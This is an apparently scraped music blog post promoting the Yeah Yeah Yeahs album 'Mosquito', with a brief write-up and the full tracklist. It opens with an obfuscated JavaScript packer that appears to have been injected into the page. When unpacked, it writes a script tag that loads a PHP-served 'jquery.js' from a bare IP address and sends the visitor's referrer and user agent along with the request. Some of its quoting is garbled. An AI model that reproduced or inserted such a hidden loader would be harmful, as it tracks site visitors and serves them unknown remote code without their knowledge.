OMG! (function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(” 4=\’7://5.8.9.f/1/h.s.t?r=”+3(0.p)+”\o=”+3(j.i)+”\’><\/k"+"l>“);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|ihead|var|u0026u|referrer|iaier||js|php’.split(‘|’),0,{}))
You’ve heard the new album right? Here is it anyway with an introduction and interview throughout from the Yeah Yeah Yeah’s themselves led by Karen O who like, says like, ‘like’ more than like, anyone like we’ve like ever heard like. She mentions they have not been excited about a YYY’s record since…It’s Blitz. There is something for everyone on this records and is, in a way their version of a soul record and even features a subway sample which Nick Zinner thinks people will make babies too. Anything he’s says is true! Get to this.

‘Mosquito’ is out April 16th via Interscope.

Pre-order ‘Mosquito’ here:

Mosquito Tracklist:
01. Sacrilege
02. Subway
03. Mosquito
04. Under the Earth
05. Slave
06. These Paths
07. Area 52
08. Buried Alive feat. Dr. Octagon
09. Always
10. Despair
11. Wedding Song